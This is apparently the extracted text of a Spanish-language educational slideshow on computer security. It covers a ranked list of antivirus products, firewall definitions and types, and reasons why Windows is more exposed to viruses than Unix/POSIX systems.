  • 36. TOP 10 Antivirus 1 - KAV (Kaspersky Anti-virus) - E A D R H - www.kaspersky.com 2 - F-Secure - E A D R H - www.f-secure.com 3 - eScan - E A D R H - www.mwti.net 4 - AntiVir - E A D R H - www.antivir.es 5 - Microsoft Security Essentials - E A D S G - www.microsoft.com/Security_Essentials 6 - BitDefender Prof.+ - A D R H - www.bitdefender.com 7 - NOD32 Anti-Virus - E A D R S H - www.nod32.com 8 - McAfee VirusScan - E A H - www.mcafee.com 9 - G DATA - E A D R H - www.gdata.de/portal/ES 10 - Avast! Home - E A D H G - www.avast.com 11 - AVG Professional - E A S H G - www.grisoft.com 12 - Norton Anti-Virus - A D R H - www.symantec.com 13 - Panda antivirus - E A R H - www.pandasoftware.es 14 - F-Prot Anti-Virus - E A S H - www.f-prot.com 15 - RAV Desktop - A H - www.ravantivirus.com
  • 37. Eliminación De virus Por Fuerza Bruta
  • 38.  
  • 39. Una firewall es un sistema diseñado a para prevenir el acceso no autorizado a su computadora o red. Una red tiene dos o más computadoras individuales unidas. ¿Que es un Firewall?
  • 40. T ipos de firewalls • El servidor remoto o proxy • Las monitoras de rutas • Firewall de red de alto nivel de seguridad. • La aplicación o programa de firewall es probablemente el tipo más común.
  • 43. Windows 1.- Su gran popularidad, como sistema operativo, entre los ordenadores personales, PC. Se estima que, en el 2007, un 90% de ellos usa Windows.[cita requerida] Esta popularidad basada en la facilidad de uso sin conocimiento previo alguno, facilita la vulnerabilidad del sistema para el desarrollo de los virus,[cita requerida] y así atacar sus puntos débiles, que por lo general son abundantes. 2.- Falta de seguridad en esta plataforma (situación a la que Microsoft está dando en los últimos años mayor prioridad e importancia que en el pasado). Al ser un sistema muy permisivo con la instalación de programas ajenos a éste, sin requerir ninguna autentificación por parte del usuario o pedirle algún permiso especial para ello (en los Windows basados en NT se ha mejorado, en parte, este problema).
  • 44. Windows 3.- Software como Internet Explorer y Outlook Express, desarrollados por Microsoft e incluidos de forma predeterminada en las últimas versiones de Windows, son conocidos por ser vulnerables a los virus ya que éstos aprovechan la ventaja de que dichos programas están fuertemente integrados en el sistema operativo dando acceso completo, y prácticamente sin restricciones, a los archivos del sistema. Un ejemplo famoso de este tipo es el virus ILOVEYOU, creado en el año 2000 y propagado a través de Outlook. 4.- La escasa formación de un número importante de usuarios de este sistema, lo que provoca que no se tomen medidas preventivas por parte de estos, ya que este sistema está dirigido de manera mayoritaria a los usuarios no expertos en informática. Esta situación es aprovechada constantemente por los programadores de virus.
  • 45. POSIX
  • 46. POSIX # Tradicionalmente los programadores y usuarios de sistemas basados en Unix han considerado la seguridad como una prioridad por lo que hay mayores medidas frente a virus, tales como la necesidad de autenticación por parte del usuario como administrador o root para poder instalar cualquier programa adicional al sistema. # Los directorios o carpetas que contienen los archivos vitales del sistema operativo cuentan con permisos especiales de acceso, por lo que no cualquier usuario o programa puede acceder fácilmente a ellos para modificarlos o borrarlos. Existe una jerarquía de permisos y accesos para los usuarios. # Relacionado al punto anterior, a diferencia de los usuarios de Windows, la mayoría de los usuarios de sistemas basados en Unix no pueden normalmente iniciar sesiones como usuarios &quot;administradores' o por el superusuario root, excepto para instalar o configurar software, dando como resultado que, incluso si un usuario no administrador ejecuta un virus o algún software malicioso, éste no dañaría completamente el sistema operativo ya que Unix limita el entorno de ejecución a un espacio o directorio reservado llamado comúnmente home.
  • 47. POSIX # Estos sistemas, a diferencia de Windows, son usados para tareas más complejas como servidores que por lo general están fuertemente protegidos, razón que los hace menos atractivos para un desarrollo de virus o software malicioso. # En el caso particular de las distribuciones basadas en GNU/Linux y gracias al modelo colaborativo, las licencias libres y debido a que son más populares que otros sistemas Unix, la comunidad aporta constantemente y en un lapso de tiempo muy corto actualizaciones que resuelven bugs y/o agujeros de seguridad que pudieran ser aprovechados por algún malware.